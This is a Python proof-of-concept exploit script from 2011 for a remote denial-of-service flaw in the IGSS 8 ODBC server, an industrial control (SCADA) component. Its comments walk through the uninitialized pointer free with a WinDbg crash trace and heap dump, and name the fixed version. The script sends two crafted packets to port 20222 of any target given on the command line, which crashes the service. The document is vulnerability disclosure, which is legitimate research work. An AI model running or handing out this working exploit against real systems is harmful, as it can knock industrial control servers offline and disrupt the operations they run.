#!/usr/bin/python # igss.py # IGSS 8 ODBC Server Multiple Remote Uninitialized Pointer Free DoS # Jeremy Brown / jbrown at patchtuesday dot org # Mar 2011 # # There are multiple remote uninitialized pointer free conditions in IGSS's ODBC # server. By sending a specially crafted packet to listening port 20222, it is # possible to crash the server. Execution of arbitrary code is unlikely. # # Note: IGSS uses a 3rd party ODBC driver kit from Dr. DeeBee. # # HEAP[Odbcixv8se.exe]: Invalid allocation size - 8899AABB (exceeded 7ffdefff) # HEAP[Odbcixv8se.exe]: Invalid Address specified to RtlGetUserInfoHeap( 00150000, 00175008 ) # (f10.cf8): Break instruction exception - code 80000003 (first chance) # eax=00175000 ebx=00175000 ecx=7c91ead5 edx=0102fc55 esi=00150000 edi=00175008 # eip=7c90120e esp=0102fe58 ebp=0102fe5c iopl=0 nv up ei pl nz na po nc # cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 # ntdll!DbgBreakPoint: # 7c90120e cc int 3 # 0:002> g # HEAP[Odbcixv8se.exe]: Invalid Address specified to RtlGetUserInfoHeap( 00150000, 00175008 ) # (f10.cf8): Break instruction exception - code 80000003 (first chance) # eax=00175000 ebx=00175000 ecx=7c91ead5 edx=0102fc55 esi=00150000 edi=00175008 # eip=7c90120e esp=0102fe58 ebp=0102fe5c iopl=0 nv up ei pl nz na po nc # cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 # ntdll!DbgBreakPoint: # 7c90120e cc int 3 # 0:002> g # Heap corruption detected at 00175008 # Heap corruption detected at 00177F78 # Heap corruption detected at 001733D8 # (f10.cf8): Access violation - code c0000005 (first chance) # First chance exceptions are reported before any exception handling. # This exception may be expected and handled. # eax=00173398 ebx=00000000 ecx=feeefeee edx=001733d8 esi=00173390 edi=00150000 # eip=7c9276fc esp=0102fc34 ebp=0102fd08 iopl=0 nv up ei pl zr na pe nc # cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 # ntdll!RtlFreeHeapSlowly+0x392: # 7c9276fc 8901 mov dword ptr [ecx],eax ds:0023:feeefeee=???????? # 0:002> kb # ChildEBP RetAddr Args to Child # 0102fd08 7c96f85a 00150000 50000061 00173398 ntdll!RtlFreeHeapSlowly+0x392 # 0102fd7c 7c94bc4c 00150000 50000061 00173398 ntdll!RtlDebugFreeHeap+0x193 # 0102fe64 7c927573 00150000 40000061 00173398 ntdll!RtlFreeHeapSlowly+0x37 # 0102ff34 7c80fd4f 00150000 00000001 00173398 ntdll!RtlFreeHeap+0xf9 # *** ERROR: Module load completed but symbols could not be loaded for Odbcixv8se.exe # 0102ff7c 0044531d 00aa001c 0102ffb4 00443abd kernel32!GlobalFree+0xb5 # WARNING: Stack unwind information not available. Following frames may be wrong. # 0102ff88 00443abd 00173398 00000014 00000016 Odbcixv8se+0x4531d # 0102ffb4 7c80b729 00000710 00000000 00000000 Odbcixv8se+0x43abd # 0102ffec 00000000 004436f0 00000710 00000000 kernel32!BaseThreadStart+0x37 # # feeefeee = freed memory # # RtlFreeHeap() takes three arguments: # HeapHandle --> 0x173398 # Flags --> 0x00000001 # HeapBase --> 0x173398 # # HeapBase is the pointer to the memory block that is going to be freed. # # 0:002> dd 173398 # 00173398 001733d8 ----------------------------- # 001733a8 feeefeee feeefeee feeefeee feeefeee - # 001733b8 feeefeee feeefeee feeefeee feeefeee - # 001733c8 feeefeee feeefeee feeefeee feeefeee - # 001733d8 feeefeee feeefeee feeefeee feeefeee <- # 001733e8 feeefeee feeefeee feeefeee feeefeee # 001733f8 feeefeee feeefeee feeefeee feeefeee # 00173408 feeefeee feeefeee feeefeee feeefeee # # In this example, the pointer to free happens to point to free memory. # # Tested IGSS 8 (Odbcixv8se.exe version 10299) on Windows # # Fixed version: IGSS 8 (Odbcixv8se.exe version 11003) # http://www.syware.com/download/drdeebee/gold_bug.txt #
import sys import socket
req_1=( "\x00\x00\x00\x34" "\x02\x00\x00\x00\x02\x00\x00\x00\x02\x2e\x00\x00\x00\x00\x19\x49" "\x47\x53\x53\x33\x32\x76\x38\x20\x4f\x44\x42\x43\x20\x4e\x65\x74" "\x77\x6f\x72\x6b\x20\x44\x53\x00\x00\x00\x00\x02\x20\x00\x00\x00" "\x00\x02\x20\x00" )
req_2=( "\x00\x00\x00\xff"+ # length "\x16"+ # switch code "\x77" * 254+ # begin query here "\x88\x99\xaa\xbb" # test )
if len(sys.argv)!=2: print "Usage: %s <target>" % sys.argv[0] sys.exit(0)
target=sys.argv[1] port=20222 cs=target,port
sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM) sock.connect(cs) sock.settimeout(1)
sock.send(req_1)
try: resp=sock.recv(1024) print "resp_1 = %s\n"%resp.encode("hex") except: pass
sock.send(req_2)
try: resp=sock.recv(1024) print "resp_2 = %s\n"%resp.encode("hex") except: pass
sock.close()
|